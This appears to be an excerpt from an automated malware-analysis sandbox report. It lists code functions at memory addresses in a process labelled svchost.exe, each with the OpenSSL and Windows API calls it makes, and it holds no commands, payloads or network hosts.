Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4849C0 CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,26_2_00007FFBAB4849C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42E9C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,26_2_00007FFBAB42E9C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46AA70 CRYPTO_realloc,26_2_00007FFBAB46AA70
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB424A72 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB424A72
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB476A60 ERR_new,ERR_set_debug,SetLastError,BIO_write,BIO_test_flags,BIO_test_flags,ERR_new,ERR_set_debug,CRYPTO_free,26_2_00007FFBAB476A60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB444A60 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,26_2_00007FFBAB444A60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB426A90 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,OSSL_PARAM_construct_int,OSSL_PARAM_construct_end,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,26_2_00007FFBAB426A90
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB412A80 CRYPTO_free,CRYPTO_free,26_2_00007FFBAB412A80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB486A30 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB486A30
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434A20 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB434A20
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45A910 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,26_2_00007FFBAB45A910
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4568B0 CRYPTO_zalloc,CRYPTO_free,26_2_00007FFBAB4568B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB43A8B0 EVP_PKEY_new,CRYPTO_malloc,CRYPTO_malloc,ERR_set_mark,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,ERR_pop_to_mark,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,26_2_00007FFBAB43A8B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB49A8B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB49A8B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45E960 BIO_ADDR_family,BIO_ADDR_family,memcmp,BIO_ADDR_family,BIO_ADDR_family,memcmp,CRYPTO_malloc,BIO_ADDR_clear,BIO_ADDR_clear,26_2_00007FFBAB45E960
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB482930 CRYPTO_realloc,26_2_00007FFBAB482930
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46A940 CRYPTO_zalloc,26_2_00007FFBAB46A940
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB412940 CRYPTO_zalloc,_beginthreadex,CRYPTO_free,26_2_00007FFBAB412940
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45CFF0 CRYPTO_realloc,26_2_00007FFBAB45CFF0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47AFE0 CRYPTO_free,26_2_00007FFBAB47AFE0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41D010 EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB41D010
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB431000 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_realloc,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,26_2_00007FFBAB431000
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47EFA0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,26_2_00007FFBAB47EFA0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB472FA0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,26_2_00007FFBAB472FA0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB498FD0 CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,26_2_00007FFBAB498FD0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB416FC0 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,26_2_00007FFBAB416FC0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB425070 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,26_2_00007FFBAB425070
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB491090 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB491090
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB411030 GetEnvironmentVariableW,GetACP,MultiByteToWideChar,malloc,MultiByteToWideChar,GetEnvironmentVariableW,malloc,GetEnvironmentVariableW,WideCharToMultiByte,CRYPTO_malloc,WideCharToMultiByte,CRYPTO_free,free,free,getenv,26_2_00007FFBAB411030
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB425050 CRYPTO_set_ex_data,26_2_00007FFBAB425050
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB463040 RAND_priv_bytes_ex,CRYPTO_zalloc,EVP_CIPHER_fetch,EVP_CIPHER_CTX_new,EVP_CIPHER_free,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_doall,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,EVP_CIPHER_free,26_2_00007FFBAB463040
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47B040 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB47B040
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB435040 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB435040
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB430EF0 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,26_2_00007FFBAB430EF0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB462F00 OPENSSL_LH_free,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,26_2_00007FFBAB462F00
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46EED0 CRYPTO_malloc,CRYPTO_free,26_2_00007FFBAB46EED0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB43CED0 CRYPTO_free,memset,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB43CED0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB462F60 EVP_EncryptUpdate,OPENSSL_LH_retrieve,26_2_00007FFBAB462F60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB486F60 memchr,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB486F60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB462DB0 OPENSSL_LH_retrieve,CRYPTO_free,OPENSSL_LH_delete,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,26_2_00007FFBAB462DB0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41EDB0 CRYPTO_THREAD_run_once,26_2_00007FFBAB41EDB0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46EDD0 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB46EDD0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42CDC0 CRYPTO_malloc,CRYPTO_clear_free,26_2_00007FFBAB42CDC0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB414E80 CRYPTO_free,26_2_00007FFBAB414E80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB43CD10 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB43CD10
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46ED00 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB46ED00
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434CB0 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,memcpy,26_2_00007FFBAB434CB0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB478CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a,26_2_00007FFBAB478CA0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41ECD0 COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,26_2_00007FFBAB41ECD0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB484CC0 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB484CC0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB490D80 CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB490D80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB444D30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,26_2_00007FFBAB444D30
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4523F0 CRYPTO_free,26_2_00007FFBAB4523F0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB498414 ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OSSL_STACK_OF_X509_free,EVP_PKEY_free,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,26_2_00007FFBAB498414
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB448400 CRYPTO_free,CRYPTO_free,CRYPTO_free,GetCurrentProcessId,OpenSSL_version,BIO_snprintf,26_2_00007FFBAB448400
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4123C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB4123C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB452470 CRYPTO_zalloc,26_2_00007FFBAB452470
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB412460 CRYPTO_malloc,CRYPTO_zalloc,InitializeCriticalSection,CreateSemaphoreA,CreateSemaphoreA,CloseHandle,CRYPTO_free,26_2_00007FFBAB412460
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB494460 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,26_2_00007FFBAB494460
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,26_2_00007FFBAB434490
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB498426 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,26_2_00007FFBAB498426
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB430450 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,26_2_00007FFBAB430450
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB49844C CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB49844C
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4722F0 BIO_write_ex,BIO_write_ex,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB4722F0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47A2E0 RAND_bytes_ex,CRYPTO_malloc,memset,26_2_00007FFBAB47A2E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4982E7 ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB4982E7
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4202B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,strncmp,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,26_2_00007FFBAB4202B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45A2C0 CRYPTO_zalloc,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,26_2_00007FFBAB45A2C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4162C0 CRYPTO_clear_free,26_2_00007FFBAB4162C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB43C2C0 CRYPTO_free,26_2_00007FFBAB43C2C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4902C0 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB4902C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434380 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,26_2_00007FFBAB434380
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB44A330 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,CRYPTO_free,26_2_00007FFBAB44A330
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB444330 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,26_2_00007FFBAB444330
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42A330 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB42A330
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB480340 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,26_2_00007FFBAB480340
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4521E0 CRYPTO_zalloc,BIO_ctrl,BIO_ctrl,26_2_00007FFBAB4521E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4281E0 CRYPTO_get_ex_data,26_2_00007FFBAB4281E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4641B0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_insert,26_2_00007FFBAB4641B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46A1D0 CRYPTO_realloc,26_2_00007FFBAB46A1D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434260 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,26_2_00007FFBAB434260
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42E220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,26_2_00007FFBAB42E220
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4240E0 CRYPTO_get_ex_data,26_2_00007FFBAB4240E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4440E0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,26_2_00007FFBAB4440E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45C0D0 CRYPTO_free,26_2_00007FFBAB45C0D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB468160 CRYPTO_memdup,26_2_00007FFBAB468160
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434160 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,26_2_00007FFBAB434160
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47C190 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,26_2_00007FFBAB47C190
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB426190 CRYPTO_malloc,CRYPTO_free,26_2_00007FFBAB426190
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB496190 ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,d2i_PUBKEY_ex,EVP_PKEY_missing_parameters,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,26_2_00007FFBAB496190
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB460130 CRYPTO_zalloc,CRYPTO_free,26_2_00007FFBAB460130
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB420130 CRYPTO_zalloc,CRYPTO_free,26_2_00007FFBAB420130
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB458120 CRYPTO_free,26_2_00007FFBAB458120
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434120 CRYPTO_set_ex_data,26_2_00007FFBAB434120
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB438140 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB438140
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4127F0 DeleteCriticalSection,CRYPTO_free,26_2_00007FFBAB4127F0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB48C7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,26_2_00007FFBAB48C7E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45E810 CRYPTO_zalloc,26_2_00007FFBAB45E810
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB418812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,26_2_00007FFBAB418812
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB464800 OPENSSL_LH_delete,CRYPTO_free,26_2_00007FFBAB464800
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4727B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,26_2_00007FFBAB4727B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4607D0 CRYPTO_malloc,memcpy,CRYPTO_free,26_2_00007FFBAB4607D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,26_2_00007FFBAB45A7D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4667D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts,26_2_00007FFBAB4667D1
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB412860 CRYPTO_zalloc,InitializeCriticalSection,26_2_00007FFBAB412860
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB49C890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,26_2_00007FFBAB49C890
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB482880 CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB482880
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41E880 CRYPTO_THREAD_run_once,26_2_00007FFBAB41E880
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46A850 CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB46A850
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB468850 CRYPTO_realloc,26_2_00007FFBAB468850
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,26_2_00007FFBAB434840
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45C700 CRYPTO_malloc,memcmp,memcpy,memcpy,26_2_00007FFBAB45C700
